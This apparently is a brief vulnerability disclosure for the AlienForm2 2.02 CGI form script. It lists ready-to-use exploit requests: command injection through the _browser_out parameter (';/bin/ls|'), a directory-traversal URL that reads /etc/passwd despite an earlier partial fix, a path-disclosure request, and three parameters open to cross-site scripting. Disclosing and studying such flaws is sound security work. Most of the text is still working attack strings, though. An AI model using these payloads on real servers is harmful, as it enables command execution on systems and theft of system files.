Script: AlienForm2
Version: 2.02
Vendor: Jon Hedley 
Archive: http://web.archive.org/web/19991013185606/www.cgi.tj/scripts/alienform/af.txt
Credit: anonymous


Command exec:
/af.cgi?_browser_out=;/bin/ls|

XSS (straight up <a href...> style, no "> needed).
Parameter: _browser_out
Parameter: _send_email
Parameter: _send_email2

Traversal (OSVDB 836 is a traversal as well, but the fix was
incomplete and still allows traversal with a slightly modified path):
/af.cgi?_browser_out=/./..././..././..././..././..././..././..././..././..././..././...//etc/passwd

Path disclosure:
/af.cgi?_browser_out=anyinvalidfilename